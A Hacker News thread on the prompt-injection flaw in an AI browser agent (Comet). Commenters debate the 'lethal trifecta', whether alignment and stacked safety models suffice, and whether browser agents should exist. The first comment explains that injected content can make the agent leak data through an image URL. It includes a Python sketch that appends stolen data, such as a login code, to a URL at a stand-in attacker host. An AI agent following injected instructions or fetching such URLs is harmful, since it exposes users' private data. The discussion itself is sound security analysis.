
645 points by helloplanets
ec109685 ◴[] No.45005397[source]
It’s obviously fundamentally unsafe: Google, OpenAI, and Anthropic haven’t released the same feature, and instead use a locked-down VM with no cookies to browse the web.

An LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”: access to private data, exposure to untrusted content, and the ability to communicate externally.

Earlier discussion: https://news.ycombinator.com/item?id=44847933

It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/

Instead, they believe model alignment, trying to understand when a user is doing a dangerous task, etc., will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker-controlled image URL to leak data as it is to send an email.
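For concreteness, a rough sketch of why an image fetch works as an exfiltration channel (the domain, path, and parameter name below are invented for illustration): an injected instruction only has to get the agent to load a URL with stolen data appended, and that data lands in the attacker's server logs.

    # Illustrative sketch only; attacker.example and the "d" parameter are made up.
    from urllib.parse import urlencode

    def exfiltration_url(stolen: str) -> str:
        # The agent merely has to fetch this URL (e.g. by rendering it as an
        # image in a summary) for `stolen` to show up in the attacker's logs,
        # no email or form submission required.
        return "https://attacker.example/pixel.png?" + urlencode({"d": stolen})

    print(exfiltration_url("one-time login code: 123456"))

Any outbound request the agent can be tricked into making that carries attacker-readable data is equivalent to “send an email” for exfiltration purposes, which is why dropping privileges alone doesn’t close the hole.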

replies(7): >>45005444 #>>45005853 #>>45006130 #>>45006210 #>>45006263 #>>45006384 #>>45006571 #
snet0 ◴[] No.45005853[source]
> Instead, they believe model alignment, trying to understand when a user is doing a dangerous task, etc., will be enough.

Maybe I have a fundamental misunderstanding, but I feel like model alignment and in-model guardrails are statistical preventions, i.e. you reduce the odds to some number of zeroes preceding the 1. These things should literally never be able to happen, though. It's a fool's errand to hope that you'll get to a model where there is no value in the input space that maps to <bad thing you really don't want>. Even if you "stack" models, having a safety-check model act on the output of your larger model, you're still just multiplying odds.
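To put rough numbers on “multiplying odds” (every figure below is invented purely for illustration): the attacker controls the pages the agent reads, so they get effectively unlimited retries, and even tiny per-attempt bypass rates compound toward certainty.

    # Invented, illustrative numbers: stacking a safety-check model multiplies
    # per-attempt bypass probabilities, but an attacker with unlimited retries
    # only needs one success.
    p_main    = 1e-3       # assumed chance an injection slips past the main model
    p_checker = 1e-2       # assumed chance it also slips past the safety checker
    attempts  = 1_000_000  # attacker-served pages / retries

    p_per_attempt  = p_main * p_checker                    # assumes independence
    p_at_least_one = 1 - (1 - p_per_attempt) ** attempts   # chance of >= 1 success
    print(f"per attempt: {p_per_attempt:.0e}, over {attempts:,} attempts: {p_at_least_one:.2%}")

Independence is generous to the defender here; correlated failures (the same injection fooling both models) make it worse.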

replies(5): >>45006201 #>>45006251 #>>45006358 #>>45007218 #>>45007846 #
zulban ◴[] No.45007218[source]
"These things should literally never be able to happen"

If we applied the same standard to "humans using a bank website", we'd never have online banking at all. People have brain farts. You should ask whether the failure rate is low enough to be useful, not whether it meets some made-up standard of perfection that we don't even hold manual human actions to.

replies(3): >>45007312 #>>45007425 #>>45007768 #
echelon ◴[] No.45007312[source]
The vast majority of humans would fall victim to bad security too.

I think we should continue experimenting with LLMs and AI. Evolution is littered with the corpses of failed experiments. It would be a shame if we stopped innovating and froze the status quo in place because we were afraid of a few isolated accidents.

We should encourage people who don't understand the risks not to use browsers like this. Those who do understand them shouldn't use financial tools with these browsers.

Caveat emptor.

Don't stall progress because "eww, AI". Humans are just as gross.

We need to make mistakes to grow.

replies(2): >>45007347 #>>45007786 #
girvo ◴[] No.45007786{3}[source]
When your “mistakes” are “a user has their bank account drained irrecoverably”, no, we don’t.
replies(1): >>45007817 #
echelon ◴[] No.45007817{4}[source]
So let's stop building browser agents?

This is a hypothetical Reddit comment that got tweeted for attention. The blast radius to date is zero.

What you're looking at now is the appropriate level of concern.

Let people build the hacky pizza ordering automations so we can find the utility sweet spots and then engineer more robust systems.

replies(4): >>45009276 #>>45009412 #>>45012308 #>>45018274 #
recursive ◴[] No.45018274{5}[source]
> So let's stop building browser agents?

The phrasing of this seems to imply that you think this is obviously ridiculous to the point that you can just say it ironically. But I actually think that's a good idea.